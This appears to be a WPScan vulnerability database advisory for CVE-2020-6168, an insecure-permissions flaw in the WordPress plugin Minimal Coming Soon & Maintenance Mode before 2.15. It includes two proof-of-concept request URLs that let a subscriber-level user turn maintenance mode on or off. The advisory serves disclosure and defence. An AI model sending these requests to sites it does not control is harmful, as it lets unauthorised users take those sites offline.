Minimal Coming Soon & Maintenance Mode < 2.15 - Insecure Permissions: Enable and Disable Maintenance Mode



Description
There was a flaw that allowed any authenticated user with subscriber permissions or above the ability to enable and disable maintenance mode on a vulnerable site by sending a simple request.
Proof of Concept
Login as a user with subscriber or above permissions and send the following request to enable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=enabled&redirect=/wp-admin/

Alternatively, send the following request to disable maintenance mode:

/wp-admin/admin.php?action=csmm_change_status&new_status=disabled&redirect=/wp-admin/

Affects Plugin

References

CVE 2020-6168
URL https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Classification

Type BYPASS

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website wordfence.com
Submitter Twitter infosecchloe
Views 126192
Verified No
WPVDB ID 10008

Timeline

Publicly Published 2020-01-08 (3 months ago)
Added 2020-01-08 (3 months ago)
Last Updated 2020-01-09 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin